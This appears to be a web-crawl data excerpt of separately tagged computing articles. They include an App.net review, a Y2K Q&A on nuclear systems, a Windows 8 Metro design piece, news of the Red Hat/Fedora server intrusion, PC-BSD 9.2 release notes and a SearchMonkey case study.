Instead of 140 characters, you get 256. You can reply to other people’s posts (which a small handful are referring to as “appdates”), but there are no “retweet” or favorite options. You can select and view individual posts for backlinking purposes, which is incredibly helpful when using content for news breaking reference. It can probably go without saying that multimedia features like sharing photos and videos haven’t been added to App.net, but the developer community is so enthused about the platform that the building is coming fast and furious.
Which brings us to a quick note on all the building that’s happening around App.net. Much of the reason for starting App.net in the first place revolved around how platforms exist and interact with their third-party developer ecosystems. Twitter’s continued distancing between itself and outside developers was a big part of the inspiration. So it’s only fitting that much of the discussion on the alpha site revolves around the third-party community.
Web and mobile apps are in the works, as are desktop and browser extensions. You can check out the in-progress catalogue over at Github. And there are a few fun tools already at your disposal, like this app that finds your Twitter friends already using App.net, and this one that shows an endless stream of posts as they’re published, in real time.
There are a few problems that come with alternative social networks. The main one, of course, is building the userbase. As it can be assumed, Twitter’s numbers are far greater than App.net’s… obviously. And the fact that there’s no native way to find people can make diving in a little intimidating. You’re just sort of thrown in the mess, although you can use the aforementioned tool that helps you find Twitter users you know using the application to help out.
The other intimidating thing about jumping into App.net is the community – or rather, it can be intimidating. Think about the type of people interested in paying at least $50 to start using a real-time communication application – so yes, it’s pretty tech-oriented. There’s a lot of developer-speak and a lot of App.net-speak. It’s pretty narrow.
To be fair, this means that the obnoxious drivel that Twitter often dissolves to hasn’t hit the site (at least not yet). It’s a relief not to be flooded with constant celebrity news and pictures of food, if we’re being honest.
The other element that hasn’t invaded App.net (again, yet) are spambots. The price gate is certainly helping, as is its just-launched status, although there’s no chance the platform will be able to remain spam free. Regardless, it definitely shouldn’t dissolve into the massive cesspool of fake users that has engulfed Twitter’s basement.
App.net is ambitious and exciting, but it’s not a solid bet quite yet. There are also already rumors that there will be a free tier of App.net, and I’d certainly suggest waiting until we hear more on that.
As it stands, it’s interesting to be part of the early crew. And if you ever wished you could have been a part of the early Twitter machine and all the user-sourced development that happened way back when, then ante up that $50 and come on in. Otherwise, wait until there’s more outside app integration and native built-in controls.
The larger question, of course, is: does App.net stand a chance? It’s hard to say yes, but given Twitter’s fickle heart these days, it actually seems possible. I don’t want to beat a dead horse here, but Twitter isn’t the company that it used to be; it’s priorities are shifting. We can criticize and yell about it, but if Twitter wants to go ahead and become a media company (and it’s in a really good position to do just that), then that’s Twitter’s prerogative — even if it frustrates core users in doing so. That means the timing is right: We have this brief moment where real-time communication is important and popular and where the largest player to date appears to be creating some market space. Paying for apps is a hard hurdle to cross, but it could deliver us from many of the issues our social networks have trapped us into. Get our Top Stories delivered to your inbox: | 计算机 |
2015-48/3682/en_head.json.gz/10146 | Get Started With Paint.NET
By Dave Johnson, PCWorld
I routinely use high-powered photo editing programs like Adobe Lightroom, Adobe Photoshop, and Corel Paint Shop Pro. But you can get away with spending a lot less on photo editing software. You can spend nothing at all, in fact. In the past I've mentioned GIMP--a popular free, open source program. This week, I'll show you how to get started with Paint.NET as well.
Paint.NET got its start as a senior design project at Washington State University, where it was envisioned as a replacement for the Paint program in Windows. It has evolved significantly since then, though. It remains free, and today has all the basic rudiments of photo editing programs, like layers, effects, and even support for Photoshop-like plug-ins. You can download the latest version of Paint.NET from PCWorld, but you'll want to bookmark the official Paint.NET Web site as well, since there are forums, tutorials, and plug-ins available there. (You can also get to the Web site from Paint.NET's help menu.) A Quick Tour
The interface should look pretty familiar to anyone who has used a program like Photoshop or Paint Shop Pro. Nothing, though, is locked in place. The standard toolbar, for example--usually located on the left side of the screen--can be moved around anywhere in the program window. In fact, if you don't maximize the Paint.NET window, you can drag toolbars and tool palettes out of the program window completely.
The toolbar has all the basics. You'll find selection tools, a magic wand, and a clone tool | 计算机 |
2015-48/3682/en_head.json.gz/10630 | Miro for iPad
Miro Video Converter
Miro Community
Universal Subtitles
Using Miro
Miro Internet TV Blog
The Free Beauty Squadron
October 1st, 2007 by Nicholas Reville
I’ve been thinking for a long time about one of the key issues that hurts adoption of open-source software: user interface. Open-source software projects tend to be initiated and built exclusively by programmers and their focus usually lies, as it should, with core features and technology. But a project that is exclusively driven by programmers usually won’t have an elegant user interface.
Here’s another way to look at it: you can build good, useful software without having good interface, but you can’t build a good interface without having software. So a programmer can decide to start building something that’s useful to some folks and build momentum from there. But while a designer can decide to design a great UI, it won’t do a single thing until there’s some software behind it. I was reminded of this issue by the launch last week of Pixelmator. It’s a Mac photo editing application with a beautiful user interface. The Pixelmator website proclaims: “Just like your beloved Mac OS X, Pixelmator is also built on open source. It uses a very sophisticated foundation to provide you with the most powerful image editing tools available. More than 15 years of development have gone into Pixelmator.” (The headline above that section says “Pixelmator Loves Open Source”– apparently a fleeting love since Pixelmator itself is not open.)
What’s notable is that Pixelmator has created an excellent, but closed, user interface that uses open-source image manipulation code (ImageMagick). There’s no reason why those of us who care about free and open source software shouldn’t be able to mount similar efforts to bring great user interfaces to more open-source projects, while, of course, keeping everything open.
So here’s the concept that I’ve been pondering for a few months: what if there was a mini-organization that would hire a great interface designer to work with different open-source projects for 2 months at a time developing improved interfaces and user experiences? In just couple years, with a single designer, you could propel adoption of a whole bunch of wonderful open-source software.
Here’s how a Free Beauty Squadron might work. A volunteer committee of experts asks projects to apply, explaining why they are a good candidate for an overhaul and what they hope to accomplish. When a project is selected, a paid designer flies out to meet one or more team members in person and begins developing a plan. Over a 6 week period, the designer creates mockups and interfaces flows for a new user experience, all in consultation with the coders. When the designer is done, the project has graphic files, documentation of a new UI, and an implementation plan to quickly or gradually put the new interface in place. The designer reserves 2 weeks for future consultation with the project as issues inevitably arise during implementation. The committee then sends the designer to their next project. Let me acknowledge four big caveats in one sentence before the whole idea gets nit-picked by smart-alecky haters: (1) we don’t know how | 计算机 |
2015-48/3682/en_head.json.gz/10998 | Y2k Q&a
issue 315 - August 1999
To view a large version click on the image above.
What is the origin of the millennium bug?
Programmers in the 1960s decided to conserve computer memory by using only two digits to designate the year in computers’ internal clocks, with the first two digits assumed to be 19. Unless corrected, microchips and systems may misinterpret year 2000 as 1900 and malfunction. The latest estimates expect at least two per cent of all microchips to malfunction when the date rolls over from 99 to 00.
What kind of computers are vulnerable?
The Y2K (Year 2000) problem primarily affects two kinds of equipment: mainframe computer systems run by big institutions or businesses; and microchips, or ‘embedded processors’. There are an estimated 15 billion microchips worldwide, embedded in everything from smoke detectors to sewerage systems, alarms to automobiles.
The essence of the Y2K flaw is that it is unpredictable. It could make a computer stop dead or it could cause havoc by producing invalid data which is not immediately detected. (Watch your pay packets carefully over the next year...) The failure of just one chip can set off a chain of events, bringing down whole systems.
Do nuclear weapons rely on computers?
Nuclear weapons and their associated command, control and communications systems are completely dependent on computers and microchips. The US and Russia in particular monitor each other using interdependent radar, satellite and communications systems. The weapons themselves use millions of microchips, and over the years the military has tried to reduce costs by using ‘commercial-off-the-shelf’ chips (COTS) which may well be susceptible to the Y2K problem. The only way to make sure a system is Y2K compliant is to check it laboriously line by line, chip by chip.
But surely that’s what the military are doing, aren’t they?
They have been trying but failing. The US Naval Audit Service admitted on 4 January this year that ‘the Strategic Systems Programs will not meet the Department of Defense and Navy Target Completion Dates for their mission support and infrastructure.’ According to Brookings Institute analyst Bruce Blair, two systems, which are the primary mode of communications with ballistic missile submarines, will not be Y2K compliant by the turn of the century. As of June 1999 264 mission-critical systems in the US Department of Defense are still not yet Y2K compliant.
Why on earth can’t they get it together?
They’ve got huge problems. Much of the software currently in use is based upon virtually extinct programming languages that hardly anyone understands any more. The subsystems they have to test are so numerous and varied that they may not even be able to locate them. And even when they do, the microchips may have a date-specific program written into them that can’t be amended. Dry-run testing all systems and sub-systems in every conceivable scenario is fantastically time-consuming.
But if they’d checked it all we’d be safe?
Even if the military systems were completely error-free we would not be out of the woods. Any interface with another system could introduce bad data and wreak havoc. For example, US communications from Strategic Command to its nuclear submarines in the Mediterranean travel partly over the Italian telephone system.
Could a computer failure automatically launch a nuclear missile?
Unlikely. Most nuclear missiles have built-in security systems to avoid accidental launches. The missile would probably disable itself.
If the military computer systems collapse there could be false early-warning information or a blank-out, leaving both sides ignorant of what the other is doing. A malfunctioning system could wrongly suggest that an enemy missile had been launched and cause a commander to authorize a missile launch in response.
This almost happened on 3 June 1980 when US nuclear command centres showed that Soviet missiles had been launched. Bomber crews started their engines and Minuteman missiles were readied for launch. Technicians recognized this as a false alarm only just in time. The malfunction was traced back to the failure of one microchip costing 46 cents.
But that was during the Cold War...
US insistence on retaining the right to launch a pre-emptive strike has led Russia to overturn its previous policy of ‘no first use’. Both Russia and the US have a policy of launching nuclear missiles ‘on warning’. Missiles are kept on high-alert status in order that they could be fired as soon as an enemy launch was detected. Of the 36,000 nuclear weapons remaining in the world 5,000 sit in silos on high-alert status. These missiles can be fired in about 15 minutes and reach their target cities in another 30 minutes.
But surely missiles are no longer targeted on foreign cities?
It is true that all the main nuclear powers (the US, Britain, France, Russia and China) have agreed to stop targeting ‘enemy’ cities. But retargeting would only take ten seconds. And in the event of a computer malfunction, some experts argue that a missile could revert to its last targeting instructions.
Aren’t most nuclear weapons carried on submarines these days?
Yes, and these submarines, powered by nuclear reactors, are completely dependent on computers, unable even to raise a periscope without them. In one recent case involving a British Trident submarine, the nuclear-power plant was accidentally turned off and the submarine started to plummet to the ocean floor. Luckily, the reactor was turned back on before the submarine imploded from the pressure of being beyond its maximum design depth. But if Y2K problems caused the glitch there might be no way of restarting the reactor.
You only mention Britain and the US. What about other nuclear powers?
There is worryingly little information about their nuclear checking. But what there is suggests India, Pakistan, Israel, France and China are way behind the US and Britain in their preparations for the general Y2K problem, with China and Pakistan lagging farthest behind. US intelligence sources testified to Congress: ‘Its late start in addressing Y2K issues suggests Beijing will fail to solve many of its Y2K problems in the limited time remaining, and will probably experience failures in key sectors such as telecommunications, electric power and banking.’ But China is less of a worry because it does not keep its nuclear weapons on high alert and has a ‘no first use’ policy.
What about Russia?
Until February 1999 Russia was denying that its nuclear forces could face Y2K difficulties. But according to Russian scientists now working in the US, the financially starved Russian military and its antiquated computer systems are bound to be prone to failure. Since then Russia has acknowledged it has a problem and asked for financial and technical assistance. The chair of the State Communications Committee, Aleksandr Krupnov, said recently: ‘Who knows if the country will be ready? I can’t give any guarantees.’
The most worrying element is Russia’s nuclear control system, called ‘Perimeter’. According to Jane’s Intelligence Review, if Moscow looked like it was under attack, or even if command links to key Russian leaders were interrupted, Perimeter would automatically launch a communications missile that would in turn transmit the codes to launch thousands of nuclear weapons.
But surely if the US and the Russians know about the Y2K problem they will realize any warnings on New Year’s Eve are likely to be false alarms? The two countries were laying plans for a jointly operated early-warning centre that might help this. But when war in the Balkans broke out Russia broke off co-operation on this. Besides, 1 January 2000 is not the only date to worry about. There are other dates on which systems could malfunction.
Such as?
Such as 21 August 1999, when the internal clock of the Global Positioning System (by which the world now measures time, using signals from satellites) will roll over to include the year 2000, with possible calamitous results for any country whose satellite receivers haven’t been properly configured.
So what do we do?
Go to the Action Section to find out.
Comments on Y2k Q&a
Action On Education
August 5, 1999 Alarm Call
August 5, 1999 Class Wars
August 5, 1999 If you would like to know something about what's actually going on, rather than what people would like you to think was going on, then read the New Internationalist. | 计算机 |
2015-48/3682/en_head.json.gz/11824 | CloudDevOps.NETAPI Design
Developing Business Applications For Windows 8
The arrival of Windows 8 and Windows Server 2012 will bring its tablet inspired user interface to the mainstream. While many application types will readily benefit from the new design, developers of traditional business applications may wonder how their applications will fare. What might not be as readily apparent is that Metro represents a shift in mental design philosophy as much as a new graphical theme.
This is an important distinction because it shows how Metro can be relevant to all users, not just those with tablets or touchscreen based devices. To explore some of the design decisions being made when embracing Metro, Microsoft's Robert Green introduces Nadine Fox of Macadamian. Together they profile an application they developed for Metro which is representative of a traditional line of business application, a business expense management system.
One of the themes Green repeatedly mentions is "content over chrome". The results of this convention are apparent in the look of the application. While the application is running under Windows 8 and driven by a mouse, the traditional menu bar and the newer ribbon are both gone. Instead, the primary content-- expense report items-- are the focus. The only tie to the traditional application is the "App Bar" which appears based on context when certain application items are selected. Otherwise it hides off screen, to minimize user distraction.
To further emphasize the content over chrome mantra, even the traditional message boxes are discouraged. Instead notifications from the application are placed inline with the fields that require the information:
Green also demonstrated some of the other Windows 8 specific features his sample application could take advantage of, including the sharing facility. This provided access to sharing via email, Twitter, or sending to quick note.
In watching the presentation, one is left with the impression that there indeed a viable path forward for business applications under the Windows 8 style UI, but they will require a new approach in their presentation and design. The challenge facing developers will be in obtaining the necessary time and artistic design resources to take advantage of the new look.
Metro Operating Systems .NET Windows 8 Microsoft Windows
Migrating to the Cloud: A Cookbook for the Enterprise
Developing on the Intel® IoT Architecture: An Introduction
Community comments This won't work
Adam Nemeth
This bears repeating
Dave Nicolette
Re: This bears repeating
This won't work
First off, Green (or MS) hired a full design firm to design the applications user interface.Actually, UX design deals with full requirements specification, process specification and even information architecture, so, in 4+1 terms, your application is 3/5 specified, deployment and implementation is left - all that remains for you is the code monkey job. Basically your job is to type in the UML diagrams into visual studio / C# like in the old days, except this time, you actually have to deduce the UML from the screenshots (internally, a lot of UX firms use UML-like notations, it's just they don't give it to you.) If your company has to hire a UX firm in order to design a business application, an internal tool, you're f.ed. Besides the considerable deficiencies of the Metro UI (you can't really differentiate between a button, a text entry box and an info box, simply because all of them are colored rectangles with big letters) you're lost if you need to hire a consultancy firm to write a 10-liner form based application build for native windows and for internal employees.And the text, "Form is not saved" just adds a bit of irony: it seems the UX guys themselves came from the stone age of Windows 3.1 or what... Anyone with 10 minutes of Google Docs or any iOS text editor knows that saving can be avoided, and it is done so on most mobile interfaces today.No, this won't work. If you need the same design effort to design something for desktop as you have for web, you could easily do it right to web instead.And perhaps all devs should learn psychology and UX really quick.
"If you need the same design effort to design something for desktop as you have for web, you could easily do it right to web instead."And by doing it right to web (emphasis on "right"), you've got support for mobile devices as well as conventional browsers already, without the need for a new operating system. Is Metro a solution in search of a problem?In the presentation, the developer comments at one point, "Shockingly, there are probably bugs in this app." So, there are more fundamental issues with development methods than just a fancy "new" UI. Why not address those before worrying about the niceties?
"Shockingly, there are probably bugs in this app." So, there are more fundamental issues with development methods than just a fancy "new" UI. Why not address those before worrying about the niceties?A bug is a result of a misunderstanding: it's a misunderstanding of how a certain component works, or how certain components are to interact., or what kind of approach is to be used to a certain problem.Now, you can't really avoid misunderstandings, if you have two teams working on a single product, one of them not understanding technology, the other one not understanding user interface design. The only solution to this would be that someone does both: either a technical lead, or developers understand UI design on a level that they are able to point out the misunderstandings, or UXes understand development on a level so that they're able to bring inputs to the devs which they won't misunderstand.But UI is not a nicety: it's your system to the outside world. A system is created to be used. Wether it's used by humans or other machines is a different matter, at the end of the day, it's always used by humans anyway: even an SQL database is used by office clerks at the end of the day. So, there's always a human user, as computers are deployed to solve problems for humans, not for themselves.Therefore, you can change any part of the system, as long as the UI doesn't change, users won't notice. These could be small changes, like a refactor, or large-scale changes, like full platform change from Windows to Linux, from C# to Java, from HTML to native widgets, as long as it looks exactly the same, has the exact same data, the same speed and the same bugs, for everyone actually using the system, it didn't change at all.The user interface is where, at the end of the day, your system stands or falls: it is where it's decided wether your system helped to bring humanity forward, wether it has added the sum happiness of humanity or did it detract from it.Worse, since the UI is the system for your users, it will be the language they'll speak to you: all the requirements, all the change requirements will come in in terms of UI:how they expect the system to appear to work to the outside world. The users will never give you ERDs or flowcharts they will speak the language of the UI, that's what their mental model will be based on.And since the system can only be specified in the language of the UI, it'll be specified by the guys who actually do speak that language: the UX guys. In most enterprises, it's already the UX department who does the specs.Of course, data structures and basic process flows can be deduced from that language. Worse: the UX guys do deduce it, it's just that they don't give it to you: you'll get a bunch of screenshots only. Internally, most UX firms deduce data structures and algorhithms, they'll represent it in non-standard ways, they'll build the screen mockups based on those diagrams, and then they'll throw it out and give you only the screenshots, so you'll have to start from scratch again. And since they have no engineering or mathematical background, those flows will contain certain errors.So, all in all, a design firm today doesn't do interface design only: they do a full system design, they specify every part of the system which is visible to the outside world, and will leave the implementation to the devs.Now enter Metro.Metro is a design language. It's like C++, the only difference is that while it's straightforward for C++ to know how it translates to C, and for C how does it translate to assembly, which can be translated to running code, Metro wasn't built that way. Metro was designed by people with no knowledge or understanding of how software works internally, and they were deliberately separated from the technical guys. It just levitates in the air.How it should be translated to code in a consistent manner... this exercise is left to the developer, and it's not guaranteed that it's possible.Metro was designed so that Microsoft can have a distinct interface: so that as a latecomer to the smartphone revolution, they can't be called a clone-company. In order to be not a clone, it shouldn't look or behave similarly to an iPhone or to an Android device. It should be fundamentally different.And here comes its weakness as a design language: they had to throw out well-known best practices. We know for example, that a button has to "bump out" from a plane so that people expect it to be pressable. This was shown both with physical devices (eg. totally flat remote controls) and virtual interfaces (eg. the Athena widget library). When something doesn't bump out, there's always a moment of mental confusion. It doesn't have to recede on press, as long as it has good feedback (something actually happens immediately), but it has to bump out.Sometimes, there's only one best way to do something, and anything else you do it will be inferior. It doesn't matter that you had a business reason to be different, your interface will be inferior.But the problem here, again, it's not that: the problem is that Metro wasn't designed with the developer in mind. If it takes a design firm to do a simple internal app, that means that all companies employing the new MS technologies will have to employ UX departments on a permanent basis.And it means that devs won't get to design even a hello world. They're there just to code, like in the old days of tower architects. | 计算机 |
2015-48/3682/en_head.json.gz/12392 | Cold War comfort on software engineering’s birthday
Yesterday's issues at 40
Phil Manchester
India's IT giants left gasping after water shortage
How Alan Turing wanted to base EDSAC's memory on BOOZE
Now pay attention, 007: James Bond's Q re-booted
Other topics discussed at Garmisch continue to preoccupy software producers even now. They included how to build reliable software for large projects and deliver it on time, how to devise proper education paths for programmers, and what methods and technologies might make programming easier.
The solutions put forward fitted well with the theme of software engineering in that they sought to move software production towards being a manufacturing process. Key to this was the concept of the software component - the subject of a presentation by another eminent software pioneer Doug McIlroy of Bell Labs.
"Coming from one of the larger sophisticated users of machines, I have ample opportunity to see the tragic waste of current software writing techniques," McIlroy began. "At Bell Telephone Laboratories, we have about 100 general purpose machines from a dozen manufacturers. Even though many are dedicated to special applications, a tremendous amount of similar software must be written for each.
"What I have just asked for is simply industrialism, with programming terms substituted for some of the more mechanically oriented terms appropriate to mass production. I think there are considerable areas of software ready, if not overdue, for this approach," he went on.
McIlroy's later contributions to the then-embryonic Unix operating system put these ideas into practice and the concept of components has, of course, since become enshrined in modern software production.
But despite the improvements made in software production in the last 40 years, there still remains a lot of work to be done to fully realize the ambitions of the Garmisch conference. Brian Randell emeritus professor of computing at Newcastle University and co-editor of the Garmisch proceedings in an interview with The Register told us that while there has been some progress, a great deal more work remains to be done.
Timeless issues
"The big change has been the growth of mass-installed packaged software - which did not exist at the time of Garmisch," Randell said. "We have seen the power of evolution work very well to create a wonderful variety of high-quality software. But in the area of custom-built software - the focus of the 1968 conference - we still face huge problems and there are still horror stories about large projects which have failed."
Randell acknowledged that the problems software engineers are trying to solve now are much more complex than they were 40 years ago - but he is disappointed that there has not been more progress in three key areas.
"I would like to see better program language and development environment support - it is too fragmented and there are around 8,000 different programming languages which is very divisive.
"I would have liked to have seen more extensive use of components, and I would like to see more progress in multiprocessing. There are a lot of vague things being said about 'multicore' these days - but you don't solve a research problem by giving it a new name."
Many of the Garmisch participants have moved on to the computer room in the sky and the rest are retired or semi-retired. But the legacy they created in a German town 40 years ago - that software production was important enough to merit serious, disciplined study - will live on for a long time. ® | 计算机 |
2015-48/3682/en_head.json.gz/12809 | Red Hat, Fedora servers infiltrated by attackers
Unknown attackers infiltrated Red Hat and Fedora servers but did not …
by Ryan Paul
Linux distributor Red Hat has issued a statement revealing that its servers were illegally infiltrated by unknown intruders. According to the company, internal audits have confirmed that the integrity of the Red Hat Network software deployment system was not compromised. The community-driven Fedora project, which is sponsored by Red Hat, also fell victim to a similar attack. "Last week Red Hat detected an intrusion on certain of its computer systems and took immediate action," Red Hat said in a statement. "We remain highly confident that our systems and processes prevented the intrusion from compromising RHN or the content distributed via RHN and accordingly believe that customers who keep their systems updated using Red Hat Network are not at risk." Although the attackers did not penetrate into Red Hat's software deployment system, they did manage to sign a handful of Red Hat Enterprise Linux OpenSSH packages. Red Hat has responded by issuing an OpenSSH update and providing a command-line tool that administrators can use to check their systems for potentially compromised OpenSSH packages. Key pieces of Fedora's technical infrastructure were initially disabled earlier this month following a mailing list announcement which indicated only that Fedora personnel were addressing a technical issue of some kind. Fedora project and leader and board chairman Paul W. Frields clarified the situation on Friday with a follow-up post in which he indicated that the outage was prompted by a security breach. Fedora source code was not tampered with, he wrote, and there are no discrepancies in any of the packages. The system used to sign Fedora packages was among those affected by the incursion, but he claims that the key itself was not compromised. The keys have been replaced anyway, as a precautionary measure. "While there is no definitive evidence that the Fedora key has been compromised, because Fedora packages are distributed via multiple third-party mirrors and repositories, we have decided to convert to new Fedora signing keys," he wrote. "Among our other analyses, we have also done numerous checks of the Fedora package collection, and a significant amount of source verification as well, and have found no discrepancies that would indicate any loss of package integrity." Assuming that Red Hat and Fedora are accurately conveying the scope and nature of the intrusion, the attacker was effectively prevented from causing any serious damage. Red Hat's security measures were apparently sufficient to stave off a worst-case scenario, but the intrusion itself is highly troubling. Red Hat has not disclosed the specific vulnerability that the intruders exploited to gain access to the systems. Like the recent Debian openssl fiasco, which demonstrated the need for higher code review standards, this Red Hat intrusion reflects the importance of constant vigilance and scrutiny. When key components of open source development infrastructure are compromised, it undermines the trust of the end-user community. In this case, Red Hat has clearly dodged the bullet, but the situation could have been a lot worse. Further reading
Red Hat: OpenSSH blacklist script
Paul Frields: Infrastructure report
Ryan Paul / Ryan is an Ars editor emeritus in the field of open source, and and still contributes regularly. He manages developer relations at Montage Studio.
@segphault on Twitter | 计算机 |
2015-48/3682/en_head.json.gz/13442 | What's New/9.2
Revision as of 08:28, 25 September 2013 by Drulavigne (Talk | contribs)
Based on FreeBSD 9.2-RELEASE which adds this [NO URL YET list of features].
PC-BSD® is only available on 64-bit systems and the graphical installer will format the selected drive(s) or partition as ZFS. This means that images are no longer provided for 32-bit systems and that the graphical installer no longer provides an option to format with UFS.
GRUB is used to provide the graphical boot menu. It provides support for multiple boot environments, serial consoles, GPT booting, UEFI, graphics, and faster loading of kernel modules. During installation, most other existing operating systems will automatically be added to the boot menu.
The system has changed from the traditional ports system to pkgng and all of the PC-BSD® utilities that deal with installing or updating software use pkgng. This means that you can safely install non-PBI software from the command line and that a system upgrade will no longer delete non-PBI software.
The pkgng repository used by the software installed with the operating system is updated on or about the 5th and 20th of each month and a new freebsd-update patch is released on the 1st of each month.
The PC-BSD® utilities that deal with installing software or updates use aria2[1] which greatly increases download speed over slow links. aria2 achieves this by downloading a file from multiple sources over multiple protocols in order to utilize the maximum download bandwidth. The pc-pkg command has been added as a wrapper script to pkg. Use pc-pkg if you wish to increase your download speed when installing or upgrading pkgng packages.
PC-BSD® uses a Content Delivery Network (CDN) service for its network backbone. This means that users no longer have to pick a mirror close to their geographical location in order to get decent download speeds when downloading PC-BSD, updates, or software. It will also prevent failed updates as it removes the possibility of a mirror being out of date or offline. The source code repository for PC-BSD® has changed to GitHub[2]. Instructions for obtaining the source code using git can be found on our trac site[3].
The installer provides a built-in status tip bar, instead of tooltips, to display text about the moused-over widget.
If a non-English language is selected during installation, the post-installation configuration screens will automatically be displayed in the selected language.
The initial installation screen provides an option to load a saved installation configuration file from a FAT-formatted USB stick.
The installer provides an option to install a Desktop or a Server. If you select to Install a Server, it will install TrueOS®, a command-line version of FreeBSD which adds the command-line versions of the PC-BSD® utilities.
The Advanced Mode screen provides configurable options to force 4K sector size, install GRUB, and set the ZFS pool name.
The installation summary screen provides an option to save configuration of the current installation selections to a FAT-formatted USB stick so that it can be re-used at a later time.
The PEFS encryption system has replaced the GELI encryption system. PEFS offers several benefits over GELI. Rather than encrypting the entire disk(s), which may expose too much known cryptographic data, it can be used on a per-user basis to encrypt that user's home directory. When the user logs in, their home directory is automatically decrypted and it is again encrypted when the user logs out. PEFS supports hardware acceleration. It can also be used to encrypt other directories using the command line; read man pefs for examples.
The encryption option has been removed from the installer and has been replaced by a "Encrypt user files" checkbox in the post-installation Create a User Screen for the primary login account and in the User Manager utility for creating additional user accounts. If you choose to use PEFS, it is very important to select a good password that you will not forget. At this time, the password cannot be easily changed as it is associated with the encryption key. A future version of PC-BSD® will provide a utility for managing encryption keys. In the mean time, this forum post provides a work around if you need to change a password of a user that is using PEFS.
It is possible to easily Convert a FreeBSD System to PC-BSD®.
When administrative access is needed, the user will be prompted for their own password. This means that users do not have to know the root password. Any user which is a member of the wheel group will have the ability to gain administrative access. By default, the only user in this group is the user account that you create during post-installation configuration. If additional users need this ability, use the Groups tab of User Manager to add them to the wheel group.
AppCafe® has been re-designed with a cleaner code base. New features include the ability to perform actions on multiple applications, save downloaded .pbi files to a specified directory, downgrade installed software if an earlier version is available as a PBI, and improved search ability. EasyPBI has been revamped as version 2, making it even easier to create PBIs.
A graphical Package Manager utility has been added to Control Panel.
A graphical Boot Manager utility for managing boot environments and the GRUB configuration has been added to Control Panel.
The mirrors tab of System Manager has been removed as downloads are provided through a CDN.
The system packages tab has been removed from System Manager as this functionality is provided in Package Manager.
The boot screen section has been removed from System Manager.
The Mount Tray interface and detection algorithm has been improved. It can also mount an ISO to a memory disk.
A graphical PC-BSD® Bug Reporting has been added to Control Panel.
Many improvements to Warden® including the ability to create jails by hostname instead of by IP address, jail IP addresses can be changed after jail creation, vimage can be enabled/disabled on a per-jail basis, IPv4 or IPv6 addressing can be enabled or disabled, aliases can be added on a per-jail basis, and jail sysctls can be easily enabled on a per-jail basis.
A Template Manager has been added to Warden®. Templates can be added then used to create a new jail. For example, templates can be used to install different versions of FreeBSD and have been tested from FreeBSD 4.1.1 to FreeBSD-CURRENT.
The ability to use an external DHCP server has been added to Thin Client and the ports collection is no longer a requirement for using this script.
The system uses /etc/rc.conf.pcbsd as the default, desktop operating system version of the RC configuration file. The server operating system version of this file is called /etc/rc.conf.trueos. Do not make any changes to either of these files. Instead, make any needed customizations to /etc/rc.conf. This way, when the system is upgraded, changes to the default configuration file will not affect any settings and overrides which have been placed into /etc/rc.conf. The default wallpaper has been updated and 9.2 is referred to as PC-BSD® Isotope Infusion to differentiate it from 9.1.
The graphical gsmartcontrol[4] command has been added to PC-BSD® and the command line equivalent smartctl has been added to both PC-BSD® and TrueOS®. These utilities can be used to inspect and test the system's SMART[5]-capable hard drives to determine their health.
Mosh has been added to base to provide an SSH replacement over intermittent links.
VirtualBox[6] has been added to base which should prevent kernel module mis-matches. If you are currently using the VirtualBox PBI, you should uninstall it.
↑ http://aria2.sourceforge.net/
↑ https://github.com/pcbsd/
↑ http://trac.pcbsd.org/wiki/GettingSource
↑ http://gsmartcontrol.berlios.de/home/index.php/en/About
↑ http://en.wikipedia.org/wiki/S.M.A.R.T.
Other languages:German • English • French • Ukrainian Retrieved from ‘http://wiki.pcbsd.org/index.php?title=What%27s_New/9.2&oldid=35853’ Categories: HandbookIntroductionWhat's NewHidden category: Has references Personal tools | 计算机 |
2015-48/3682/en_head.json.gz/14588 | W3C Home
Semantic Web Activity
Opening up search
Benefits of using SW
List of SW Use cases
> Semantic Web Use Cases and Case Studies
Case Study: Improving Web Search Using Metadata
Peter Mika,
Yahoo! Research,
Presenting compelling search results depends critically on understanding what is there to be presented on the first place. Given that the current generation of search engines have a very limited understanding of the query entered by the user, the content returned as a result and the relationship of the two, the opportunities for customizing search results have been limited.
The majority of Web pages today are generated from databases, and Web site owners increasingly are providing APIs to this data or embedding information inside their HTML pages with microformats, eRDF, or RDFa. In other cases, structured data can be extracted with relative ease from Web pages that follow a template using XSLT stylesheets.
SearchMonkey reuses structured data to improve search result display with benefits to both search users, developers, and publishers of web content. The first type of applications are focusing on remaking the abstracts on the search result page: Figure 1 shows the kind of presentations that structured data enables in this space. Based on data, the image representing the object can be easily singled out. One can also easily select the most important attributes of the object to be shown in a table format. Similarly for links: the data tells which links represent important actions the user can take (e.g. play the video, buy the product) and these links can be arranged in a way that their function is clear. In essence, knowledge of the data and its semantics enables to present the page in a much more informative, attractive, and concise way.
Figure 1: search results using SearchMonkey
The benefits for publishers are immediately clear: when presenting their page this way publishers can expect more clicks and higher quality traffic flowing to their site. In fact, several large publishers have moved to implement semantic metadata markup (microformats, eRDF, RDFa) specifically for providing data to SearchMonkey.
On the other hand, users also stand to benefit from a better experience. The only concerns on the users’ part is the possibility of opting out and having a system free of spam. Both concerns are addressed by the Yahoo Application Gallery. As shown in Figure 2, the Gallery allows users to selectively opt in to particular SearchMonkey applications. Users also have a small number of high-quality applications that are turned on by default. The gallery is also an effective spam detection mechanism: applications that are popular are unlikely to contain spam. Also important to note that the presence of metadata does not affect the ranking of pages. Pages that are trusted by the search engine based on other metrics can be also expected to contain trustable metadata.
For developers, the excitement of the system is in the possibility to take part in the transformation of search and develop applications that are possibly displayed to millions of users every day. Needless to say, many publishers become developers themselves, creating applications right after they have added metadata to their own pages.
Figure 2: Yahoo Application Gallery (a larger version of the image is also available)
The high level architecture of the system (shown in Figure 3) can be almost entirely reconstructed from the above description. The user’s applications trigger on URLs in the search result page, transforming the search results. The inputs of the system are as follows:
Metadata embedded inside HTML pages (microformats, eRDF, RDFa) and collected by Yahoo Slurp, the Yahoo crawler during the regular crawling process.
Custom data services extract metadata from HTML pages using XSLT or they wrap APIs implemented as Web Services.
Metadata can be submitted by publishers. Feeds are polled at regular intervals.
Figure 3: High level architecture of the system
Developers create custom data services and presentation applications using an online tool (see Figure 4). This tool is a central piece of the SearchMonkey experience: it gives developers access to all their services and applications. When defining new custom data services, first some basic information is provided such as name and description of the service and whether it will execute an XSLT or call a Web Service. In the next step, the developer defines the trigger pattern and some example URLs to test the service with. Next, the developer constructs the stylesheet to extract data or specifies the Web Service endpoint to call. (Web Services receive the URL of the page as an input.) When developing XSLTs, the results of the extraction are shown immediately in a preview to help developers debug their stylesheets. After that the developer can share the service for others to build applications on and can also start building his own presentation application right away. Note that custom data services are not required if the application only uses one of the other two data sources (embedded metadata or feeds).
